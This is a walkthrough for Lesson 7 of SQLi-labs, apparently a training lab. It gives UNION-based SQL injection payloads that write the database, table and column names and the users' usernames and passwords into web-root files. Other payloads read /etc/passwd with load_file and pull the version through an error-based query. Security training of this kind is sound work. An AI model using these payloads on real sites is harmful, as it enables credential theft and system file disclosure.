SQLi-labs: Lesson 7

  1. Get the database name:

    ?id=1')) UNION SELECT(select database()),2,3 into outfile "/var/www/html/sqli/Less-7/1.txt";--+ Content of 1.txt: So, the database used is 'security'.

  2. Get all table names of 'security':

    ?id=1')) UNION SELECT (select group_concat(table_name) from information_schema.tables where table_schema='security'),2,3 into outfile "/var/www/html/sqli/Less-7/2.txt";--+

    Content of 2.txt:

    So, there're four tables in 'security': emails, referers, uagents, users.

  3. Get all columns of table 'users':

    ?id=1')) UNION SELECT (select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),2,3 into outfile "/var/www/html/sqli/Less-7/3.txt";--+

    Content of 3.txt:

    So,three columns: id, username, password.

  4. Get all username&password pairs:

    ?id=1')) UNION SELECT id, username, password from users into outfile "/var/www/html/sqli/Less-7/4.txt";--+

    Content of 4.txt:

    Comments:

    Also can load_file("/etc/passwd") to dump the passwd file:

    ?id=1')) union select load_file("/etc/passwd"),2,3 into outfile "/var/www/html/sqli/Less-7/5.txt";--+

To get the database version, use the following query:

?id=1')) AND (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

results matching ""

    No results matching ""